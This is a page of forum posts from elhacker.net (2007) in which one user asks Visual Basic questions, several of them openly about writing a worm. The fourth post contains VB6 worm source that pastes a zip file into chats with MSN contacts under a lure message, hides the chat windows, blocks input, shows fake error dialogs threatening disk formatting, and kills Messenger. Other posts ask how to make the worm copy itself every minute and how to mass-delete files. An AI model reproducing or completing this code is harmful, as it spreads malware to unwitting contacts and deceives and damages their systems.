elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: [1]
1  Programación / Programación Visual Basic / Borrar archivos con X extension(solucionado) en: 25 Noviembre 2007, 15:29 pm
Hola, pongo este post porque el codigo de http://foro.elhacker.net/index.php/topic,188682.0.html no funciona al 100%,

si creo una carpeta que se llame O dentro de C:\ (quedaria asi C:\O\) y pongo que borre todos los txt, los borra y tambien los que estan en subcarpetas
pero si pongo que los borre en C:\ no borra nada  :-\, esta algo mal del codigo o algo?

saludos
2  Programación / Programación Visual Basic / Autocopiarse cada minuto en: 23 Noviembre 2007, 16:23 pm
Hola, como puedo hacer para que mi worm se copie cada minuto con nombres aleatorios
3  Programación / Programación Visual Basic / buscar archivos con una determinada extension y borrarlos en: 18 Noviembre 2007, 00:29 am
hola, como puedo buscar en el disco duro todos los archivos con extension *.jpg(por ejemplo) y luego borrarlos??

saludos
4  Programación / Programación Visual Basic / ocultar las ventanas de conversacion de msn en: 14 Noviembre 2007, 16:10 pm
hola , estoy haciendo un worm y estoy un poco pillado con la parte del msn.

este es el code de mi parte del MSN(hecho por Hendrix, he añadido algunas cosas):
Código:
'declaraciones
Private WithEvents MSN As MessengerAPI.Messenger
 Dim contactos
Dim contacto
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Const SW_HIDE = 0
Private Const SW_SHOW = 5
Dim Window As Long

Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long
Const KEYEVENTF_KEYUP = &H2
Const VK_LWIN = &H5B

Private Sub Form_Load()
On Error Resume Next
Dim ap(0) As String
ap(0) = "C:\DSC00082.zip"
If ClipboardCopyFiles(ap) = True Then ' Nos ponemos en el Portapapeles
End If
Wait (1) ' Esperamos 1 respiro al procesador...


 
  Set MSN = New MessengerAPI.Messenger
Set contactos = MSN.MyContacts
 
For Each contacto In contactos
    If contacto.Status <> 1 Then
        List1.AddItem contacto.SigninName
    End If
Next
 
Window = FindWindow(vbNullString, List1.List)
 If Window = 0 Then 'si no encuentra la ventana
  MsgBox "Instala MSN Messenger o de lo contrario tu disco duro quedara completamente formateado", vbCritical + vbInformation, "Error" 'sale un mensaje de error
  Else
  ShowWindow Window, SW_HIDE 'showWindow ocultara la venta
  End If


Set w = CreateObject("Messenger.UIAutomation")
For Each contacto In w.MyContacts 'Vamos de contacto en contacto
If (contacto.Status = 2) Or (contacto.Status = 10) Or (contacto.Status = 14) Or (contacto.Status = 34) Or (contacto.Status = 50) Or (contacto.Status = 66) Then
Set iMsn = w.InstantMessage(contacto.SigninName)

SendKeys "^V"
DoEvents
Sleep 1
SendKeys "mira k foto me ice el otro dia"
DoEvents
SendKeys "{ENTER}"
DoEvents
Sleep 1
End If
Next
Wait (1) ' Esperamos un segundito para no "atascar" tanto...
' A partir de aki sirve para minimizar todas las ventanas...
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)

DoEvents
BlockInput True
Sleep 15000
BlockInput False

ShowWindow Window, SW_SHOW 'esto es para mostrar la ventana oculta

MsgBox "Error en el volumen 800fs00x0658 del servicio Windows Live Messenger. Por favor inicie sesion de nuevo", vbInformation, "Windows Live Messenger"
Shell "cmd.exe /c taskkill /f /im msnmsgr.exe"
end sub

añdo un listbox para que se carguen los contactos ahi y asi luego poder ocultar sus ventanas pero al compilarlo me da un error con .list de lis1.list

¿¿que puedo hacer para minimizar las ventanas de conversacion con la lista de contactos en un listbox, porque me da error en .list??
o usais otra forma para ocultar las ventanas de conversacion?

saludos ;)
5  Programación / Programación Visual Basic / duda con Visual Basic 2008 en: 11 Noviembre 2007, 00:17 am
Hola, segun tengo entendido vb 2008 es plataforma .net y es como si fuera vb 9.0
Yo me estoy iniciando en vb 6.0 y no quiero pensar que estoy perdiendo el tiempo, ya que he leido que vb.net es mas potente y vb6 no tiene futuro.

he probado en vb 2008 y me resulta mas dificil,pero ¿hago el esfuerzo de aprender vb 2008(.net) o sigo con vb 6.0 (que para mi es mas facil) y cuando lo domine un poco mas me paso a vb .net?

saludos
6  Programación / Programación Visual Basic / duda al cambiar nick de msn en: 6 Noviembre 2007, 21:36 pm
hola, mi problema es el siguiente:

Los pasos que sigo para cambiar el nick son estos
1-En proyecto,referencias; agrego messenger api type library
2- declaro esto :
Código:
Option Explicit
Public WithEvents MSN as MessengerApi.Messenger
3-en el form_load() :
Código:
Set MSN = New MessengerAPI.Messenger
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys ("minick")
SendKeys ("{ENTER}")
y al ejecutarlo me sale una pantalla como si no hubiera iniciado sesion o algo similar:

Lo raro es que hace un rato si que podia cambiar el nick :o, ¿que estoy haciendo mal? :-\

ahora tampoco me deja cargar la lista de contactos conectados en un listbox :-(!
me sale un error de compilacion en la palabra user(antes no me salia =S)

saludos
7  Programación / Programación Visual Basic / Como puedo crear una aplicacion que se ejecute sin la pantalla del form en: 28 Octubre 2007, 16:48 pm
hola mi duda es: Como puedo crear una aplicacion que al ejecutarse no se vea la pantallita del form

por ejemplo: una aplicacion que al ejecutarse se abra el lector del cd, juntar ese archivo  y un video o algo con un joiner y que al ejecutarse solo salga el video pero que no salga ninguna ventanita, nose si me explico, yo escojo la ventana de "Aplicacion para windows"
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines